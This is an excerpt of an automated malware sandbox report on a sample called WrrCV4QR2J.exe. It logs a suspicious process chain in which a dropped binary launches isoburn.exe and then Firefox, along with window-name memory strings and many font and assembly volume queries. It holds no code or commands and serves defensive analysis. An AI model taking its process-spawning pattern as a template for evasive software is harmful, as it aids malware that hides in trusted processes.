            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exeJump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Users\user\Desktop\WrrCV4QR2J.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
